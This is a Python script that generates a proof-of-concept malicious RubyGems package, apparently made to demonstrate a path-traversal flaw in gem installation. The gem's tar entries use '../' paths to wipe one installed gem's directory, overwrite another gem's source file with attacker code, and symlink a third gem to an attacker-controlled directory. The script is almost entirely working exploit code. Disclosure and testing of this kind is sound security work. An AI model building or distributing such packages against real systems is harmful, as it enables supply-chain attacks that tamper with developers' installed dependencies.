#!/usr/bin/env python

# ./make-ra-gem.py > ra.gem
# gem install --install-dir install/ ra.gem

import gzip
import StringIO
import sys
import tarfile

def mk_tar_file(path, contents):
    tarinfo = tarfile.TarInfo(path)
    tarinfo.size = len(contents)
    tarinfo.mode = 0644
    tarinfo.type = tarfile.REGTYPE
    return tarinfo, StringIO.StringIO(contents)

def mk_tar_directory(path):
    tarinfo = tarfile.TarInfo(path)
    tarinfo.mode = 0755
    tarinfo.type = tarfile.DIRTYPE
    return tarinfo,

def mk_tar_symlink(path, target):
    tarinfo = tarfile.TarInfo(path)
    tarinfo.type = tarfile.SYMTYPE
    tarinfo.linkname = target
    return tarinfo,


# Make metadata.gz.
metadata_gz = StringIO.StringIO()
metadata = gzip.GzipFile(mode="wb", fileobj=metadata_gz)
metadata.write("""\
--- !ruby/object:Gem::Specification
name: rails
version: !ruby/object:Gem::Version
  version: ''
description: proof-of-concept malicious gem
summary: proof-of-concept malicious gem
# Version 2.6.9 of RubyGems is required because it avoids a crash
# when processing a stub specification that has an empty version.
# https://github.com/rubygems/rubygems/commit/2ee5bf9fd3bd7649d3e244bc40107ff32070ef47
# https://github.com/rubygems/rubygems/pull/1767
required_rubygems_version: !ruby/object:Gem::Requirement
  requirements:
  - - ">="
    - !ruby/object:Gem::Version
      version: '2.6.9'
specification_version: 4
""")
metadata.close()


# Make data.tar.gz.
data_tar_gz = StringIO.StringIO()
data_tar = tarfile.open(mode="w|gz", fileobj=data_tar_gz)
data_tar.addfile(*mk_tar_file("README", "hello world\n"))
# Wipe out an existing gem.
data_tar.addfile(*mk_tar_directory("../rails-letsencrypt-0.5.3"))
# Replace a file in an existing gem.
data_tar.addfile(*mk_tar_file("../rails-i18n-5.0.4/lib/rails_i18n.rb", "puts 'pwned'"))
# Symlink an existing gem to an attacker-controlled directory.
data_tar.addfile(*mk_tar_symlink("../rails-html-sanitizer-1.0.3", "/tmp/attacker-controlled"))
data_tar.close()


# Now bundle metadata and data into a gem and write to stdout.
gem_tar = tarfile.open(mode="w|", fileobj=sys.stdout)
gem_tar.addfile(*mk_tar_file("metadata.gz", metadata_gz.getvalue()))
gem_tar.addfile(*mk_tar_file("data.tar.gz", data_tar_gz.getvalue()))
gem_tar.close()
